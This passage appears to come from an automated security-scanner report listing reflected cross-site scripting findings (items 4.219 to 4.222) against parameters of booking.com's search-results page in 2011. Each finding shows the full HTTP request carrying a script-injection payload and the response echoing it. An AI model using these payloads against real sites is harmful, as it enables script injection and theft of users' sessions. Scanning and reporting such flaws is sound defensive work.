Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:13 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDblaNcgygeBHdE9Iiq6hiTqoOuVSa5d5qA8G933RR9JZEMeKyBF3iXy5IV7SWB2Rm%2BJu%2FS7rRKblOQWDKAIIa3zOOjG8HnHIMCMTIAYH96r4vnMDn4hVMpaoWqMN99reFqurSwqilEKN1PrULubwyckXc1TvPQ7lppvCjITG2c02aj9wyuptZvLQxSwozEUDVCRDcBPcGtfYmV8e%2FkBh57BZ%2BS9UDUr0XtV27vUQKGqXHdvhwqOxWjp6xQZ6VDVOOxePM%2FNhkbXqwPET4vbX2k8BO94UgvtPkObwxIUUTQMK%2BnMyltezEFfqDTSEE%2FQgKagA4d0dcivnNDysp9VymyfmbRGAVjyfwktifeQKCkrNR4EpHZM8I0PRYAWxYNUHljqb4WLA5j0rvNMArpfS32dS0UnaFa9YoMnNXQStSAJZbVr86x8S%2Fjh7JRHywVnx%2F4hWMWl9o1Y46IR9Qv3R7jrR3xYNriItNCylUqYUEu%2B61opsa3ogheFDWnwcjN7iMMEPHi%2FpNQLMTA%2BMjPCubmqu9LNESvP2geV71Pw7rw8D2Z63%2B%2FDc%2FVpyhoXWJSYVT14OAgBU79IOfNWx%2FUfA8a86v3RuqFMhiJ%2BZqOCGASysLvZCEdItR9Mwjs%2Bbm%2FM7H%2B0vt91pBecBin%2F%2BmXJ2Mlv61rd%2FVyEBsWwc%2BkQTXvWQ8iy2qSHuNN5zwKD0PeZj3cEZk04VKx2d5Fk5B9V%2B%2BjH3EBhdfA7x8QoSjFSLx4m%2BjW9lpIzXt2FNu4m9GAzxLA7NWlQPhXAeOt6GiDtC%2F4pgQmtxfWpw9P5X%2F31DBQaFZO9ihRTr%2BBGbA8tiJgKjHFkeswABUqPzCDeVemrqtxhBeIYFI59hH3U%2Fx%2Fx8bNz281CB2RhCdI3C4ZBScsixTxyxnXMmJb4ueETZ%2Bno7s0HiMyH3as3oyeD2BS5t32gYuXH6NiZsZF6CuKnepk2vwr552BQs8k8a2aqEuiJSnP%2FKB6yA57752uXApW1mIE9cujvwOWrWOTAV42QxM0pP1rCPNlUGedPLKSQK15PF5DN1Zp%2BmNC7mYXJV2SnNX27lgivMuRPn9W1GbmcZdVF27cBhmp1LNTgFt%2BIWRJnrV4lVcwRDNIWQoY6JRgTzhdL9Y9Ywma%2BbnPFvtE9D6QctByv%2BXNxTgmjBbnpvnch3cnlhIjFzai6VAxqxZJGAogok5ZwjXX6ufXXIO9WFokfAdqMJL7Rba8I6Wbv4dg8p89GLWVzGQUWh70mr7WxIwVa%2BtGndX1VFUfKV23bvDSMsVJLZyvJZ%2Fv2oV%2FLRTw2a0x03B1Hmgei5X0jd6IIjSimgKl%2F4nuP97tX3Bt%2FSwTkxUGrc%2BVK3EiylmY55%2Ftjcip138nHkpDWuT%2FvhiRFTf%2BFNWmSwDFqh%2FlLGUK4zteSMt09KVkUghSi1oJMKnl497vOz6ooVQtgR0EAKiPjT1g1omKBAvEw8wVQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:21:14 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 275535
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
en;go_back_url=http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-104ffa6"><script>alert(1)</script>558c8ba7e66&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717">
...[SNIP]...

4.219. http://www.booking.com/searchresults.html [checkout_year_month parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the checkout_year_month request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b91ee</script><script>alert(1)</script>53f99955b17 was submitted in the checkout_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10b91ee</script><script>alert(1)</script>53f99955b17&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:21:41 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdN864bAdMj5F%2B8LyEAy9%2BENkbBkfkD3xhmWaR2GVCPzzKfUTiby6MVy7BO30HJ3O9pLiRU%2BmjHeAghaEqdpI0sWrfrPQoZsDjHuqQLaOOyEtkQqeR3CSO3o0YQ0OdU7%2FTulVsRFOKol7qaucnXEddDTOiWnUxPng655yrv7j0OnPbiANbKxMmMVUcO7TD4jq7StNe641WxIo1hKXeC%2FY6xhxMwbleoTm%2Bdcr9GhZzEGlmDT4FOr11YIUKTPXO595HaWiAzqprNhSsrn%2BwgmIwRdVElEcYlsDWwKIhhdJAcyks3AvzF0fzxUbTTBaCfi2z25XU4RMilJiE3b%2BGcO76qiXtdBiwvSRXnAWWETITcRNnIqerN1vS93Sqsin50JCdB41XoMj5DAznAh1DfrjJdhciUMNw58L9QV0E%2Fp85dysV2znLmWy0pToeKMBqFmHDz9ozl7Gh40OeuV1WnwTW%2FD%2BROFSISj0UrhfSyFw4wi8cR2wnTboCKPkvSE36IYJr51nGpbP4O6ZyBvVEnGjCMQkcuMKlvgZFsVA3%2BuLZoF7SP4sk4%2FRaDFQsVW%2FpSWlunwGpuunjoSBLnP%2BWvj%2BZ1XoLnmqYPTXCpVFoIKmeuCB22vHMUj95qDuLYq50rodOkiv00fKeH8gk5eCEspyOMncJJoehaMl0dW71UQGnmI1nOPQuyDdpmcpl7flquS67uIurk76LpAxez%2BxtZ0J5tPSfKlbPfT7HNyZLYEi2yzSafxYI%2FKZWf0DPcLVc%2FMXBXvbExWaTOyizFy8E%2F2QRPAYX6kt096xHaE8KjI2AsqbIHR2Mdk9Jx9IGfi9emUM3M2RtLjCe3NJkp7Z%2FTsafci7WggjIFrh%2FDbX9vKfeXcoXrdgLglYiZOIwzL9mBUpIgqVGxOiDUbgUsaGPK1M748iR7UYlfm0yFnJDiYdfAbH4ItD9c9dw5KLzGwhWQg8guuwDCGNyIBxm8BJdBkfHYanf1ao2VBnBqcvjFeEWPs7bXsFMBbvghd8WvpCJlexsbFIcpmJnYE%2F7zt%2Bnoht%2F54gB0b9ONvTnvlQrDm1wVQmJ80NFqDMCZVBx%2Byxvid%2BvkpciMfPWigTJ%2F6sNdpkzQ5Wam7AoGR0zaKCYhIISTo1kF7he97PwwqepQS8y%2BISWsX9ONkD3X9H0GiatGlVDYQBfU3vGS2LR4AhpHMjj1Ny6Y1McR1WhdodBwUc5%2BV7KGrR7XkkUjGeoXW1TGSn0yGhbDvi3Ve8wwqg49QcsBfVuwBSAsf1MKC7UYzNdp2DN9%2BLoUK%2FcPJhIW1ACbJN429NjVDEMxZOYFsaH3%2F%2BW32CIambsCCXTFTpzdcehxgGh%2Bdk1eWXvZZk8fFvDY%2FLWCAOK2Xx%2BAeyrwZBIJy3CMJ5miaS4GVNA6d5YiGnk3RtfpSsy4Il30sBlYFyli3XIPldt3bEnEInvdG6skszprUmnkyJcEI0VpOyq52Q0caBA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:21:41 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 275555
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_se
...[SNIP]...
riginal_url : 'http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10b91ee</script><script>alert(1)</script>53f99955b17&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717',
b_this_url : '/searchresults.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca
...[SNIP]...

4.220. http://www.booking.com/searchresults.html [city parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18f2"><script>alert(1)</script>d04cfe96766 was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717d18f2"><script>alert(1)</script>d04cfe96766&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:11 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YVuoakmCuggKLF5DCyLyMK%2Fe%2BQ2GDMIsKJ1LcnaZGfXkgdWE14LACJyrSTbo27TKWmCpv3%2B8mndKVr09Xx6h5JHb7OSkHRVc1phxWcT6cfEf92NaVltPhi9zguRdOL8PTJ6vnFKJytxRHGkrkN0fHRT76M4pfKPOzdpEjIBwGkhE9F8NspuqSUfgBRD0OyIDLgFj1qX28wKkpB5VhcIL%2BhwjWY42CulfLKv6iemb%2FrbYBK5A1UhCq%2B3VdTd8sIU%2Fy8YGt%2FE0I0uoyW6Xi0YR4V5%2FsI6psC7%2BLhGRTotwa2M890oK2ixfL332hZ%2F8BkvUubop6aLha2aliYJJFubhyciLodLv%2BMqZXYckCzoEmV5iz9b2jBIax%2Bd%2FJevYnI2SWWZ2BWqg8WVSnGHCb0W1HpOE5KEnQm0wKLwJtE87PH8lsjjtleAasDQhBJhm%2BfEOWI%2FtDRnSHSie8FXJTgKiZeiwOTxV2yImVzU6UtPUTasypDlP99IE66ggkcaMZQTsQMBEoO%2Bf%2BnCr592VgLPcQrIGSFJEn75trrp6V50wegcMwreUa8qjeMC%2F%2BJ4elnDx%2BDY%2BnIkFEgvnUZV5nZFrrqBy5VrEQcbugdHiFNbqSr%2FEfn3E%2BR2J9lZF1FC%2BwRSK84kAKSwWofPQlYJfADJprkZ28%2FbfZj%2B9%2B1VE1In8%2FLCCSCqY6DIffl9iW279o%2Be65SlMLmQtmuniE4WRP0Zo0GbVSqWnvxPQ01pNllMJCQpGRZ2rq0b5UiT3UaqsSUz5Dx9ElLdB25i9qRwE2uaAlUMLJlbgKrGxYmqX6vCGrxCK9q66QPwfzW9YtmRvM36YK93FHhplLjthxw7I3qJGBLcy6OvnnxfcjnLCK1HvlT5NVnWcHV9HmqDwT842eGZqdAs9YCMYS6mfk4gcoZnrGTiEZfZsKIyimK5ezvMtohmUGU38agdXyTvCR9kDYE9oDedOOgWEcUAvZyPPDqdKgn8Xsp7avOQoOVc%2BHiqqjzEi4Bnjy2rs36r72q0vLUl8B6U0k0Skrm2FBszGhEZ%2BNv29y2sw38ptLHuHlraPoceo%2F0P9kcIR1YdMvMK%2F%2B2l1YjYzgIi%2BKT3sIzXnz1k97TqWk4tKyL7576a8bZ75ZFdIQ%2F%2BbQnn99JsZhVV%2FgCFBazbOJp6UkIgyRTz7VcZuhhjvsqk89vFMWp1qeLXkSza%2BZcO2KNk%2FxOfHswIWvWjdMdyfmlFYx6TH4VbC44U1skQOgQO9TlAFC6%2BY0zN9xv7NQhMrR6H6JuYnt%2FtksSmG9nQeE%2FPjvUYOoy5%2FPG4eytBSIow6t3D67NRNdkKL%2FaLocr7iDwgvTfQbc%2BDjGf6tgOQjrwCM9kQQJl6JMCW7Ctgg8fJmRNtSeFhUNcX6nusw4hsas6oFSULf97hrcWu0F3jSXDRgrhBdHJyFZEZxcUizUlPo%2FDXfDdOP7z4CO4aw; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:11 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 74083
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717d18f2"><script>alert(1)</script>d04cfe96766;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717" />
...[SNIP]...

4.221. http://www.booking.com/searchresults.html [city parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31107'-alert(1)-'d919aaa0e9d was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=2006171731107'-alert(1)-'d919aaa0e9d&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:21 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR0kCPIILsWbZ8r5u8%2BxLxWndBreImM%2BIVq7jSpNwrIn5x6S9Oba%2FZTPkxANiQmHNrXoGm%2Bq4E6BqlJKU64iUn5IQE61rl2F6Ga0hw7r6wqzFlNKZDRZc%2F2eIOmGLotnbibM9VCJ8IopU8FybKvy2GovF7WPdJCa4RrrdH%2BGhJBfwmDOCL4zGorgVXO2RSJJbLET%2FL%2FB%2FvVHwawU5l9FAiJvzCCxfMkk4kJyEZM9j3Avkz%2F%2BlOCoUpviOLhQ%2F4lql8YceqVlHOVUmDnb0gbIHfmvecUlfFMuLDEN8qXfSDWEi8HG5h%2Bvsg%2BderYyWv0nJoRrGlw2CZRFxDYK%2F4%2BLiKapYp699AZkxVBt68pEC26LryVkzlEZH2KCxoRcm0oCqdfGMz%2BmLufLmoWu7bTW8QpMGLD3dlwHLBD069OLHtl5p6kDxRN%2BPNVvM3f%2Fq959awQXwlXH5W%2B0Fwt%2BoMzp9nAZOoiQw8tCHVLEIHoTiwrrwQZYuGAVeCfu3OOwM1jJ5FN7ZRSrVJDUwW%2F0jWXHMvUKjczfl2oHyDueSHfNuH3JMKgibSryEcAwKWRG2y7JouV8cby9DPFjyQD9clqp7qWc7L9DFzfyZz0i1pNHyIxWlV1kEB5lDGhuIUYo0A37f3vBxl5czltIfxbs7RrByiVRDRH%2B0AYSm0F6ViZzj%2FYsifguql8eNysExs6G68H7el6mfV8ua2rBR8Vh3SvhB2rOZ1GZWVDikHfgVlOdEQy87PMZTlRYQbx%2BPjegWF9NhfgqxvrI3soVDzc3iwX9sxnxQm14x8MCZJTpHEEPk3LDgBDo9OKxVnem7KX4Bp3s73aeppi2xvwbU2ZN81xMqUsi6xOwdAAZA9Xmu12Eo1K9z%2Fnd%2BpzpHd7G54KPrNoLPM0IniEpT7swwlNJDFRT1AgzltAG0ZOSVlxhrm99S236MK0Rnjwc2V9eBYskhO1M4VXW3utdsYxkQYVTnhTW4wXTkF981KP2xsYI4PLNSJOaeKjOwvHcAqsPtNNFSyWHLBn3VWQoywezzJt3RyRRUxb5OlK0Q7bRPasOliNKNbcSazRUje0N4Nz7Qqk6CkdaqpjfiIHJ%2BObCawRuA2Kd3U3Lt3sra6odyDD1%2BGoRtuRP2zodANjdZ0IpvA6m0cLXkaJwTVjCQD2hJhCmaOSfJ%2FCw2XnJ%2BWIz4QUf4d5HFVxqIcOLwUcQ0dKBiPNbo959XwTmyibY7xVZ1KwyKlxQ5WZwHm81cTAfxmGAz48eOBN%2F2oc3h%2FAAaLV4zplC95bWKMljh1r%2BoN1TEYjDOJUA14FYZwvmCcbSu2%2FGT7UUXz%2BXBu5XFPpARvc2TrT%2FiEIhRM5G8UX5XApEfJOOaeeRjhUZ47EohH%2Fz7mj%2Bn4Yxo4uCcUST7pxORoNyBQ6YdhI36Ydps%2F2eTMM2%2BcwJ7IPPMbgs%2FOxygQuTY5w%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:22 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 74024
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
vent_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?city=2006171731107'-alert(1)-'d919aaa0e9d;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Roo
...[SNIP]...

4.222. http://www.booking.com/searchresults.html [do_availability_check parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the do_availability_check request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 241d5"><script>alert(1)</script>c693cd0ec72 was submitted in the do_availability_check parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1241d5"><script>alert(1)</script>c693cd0ec72&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H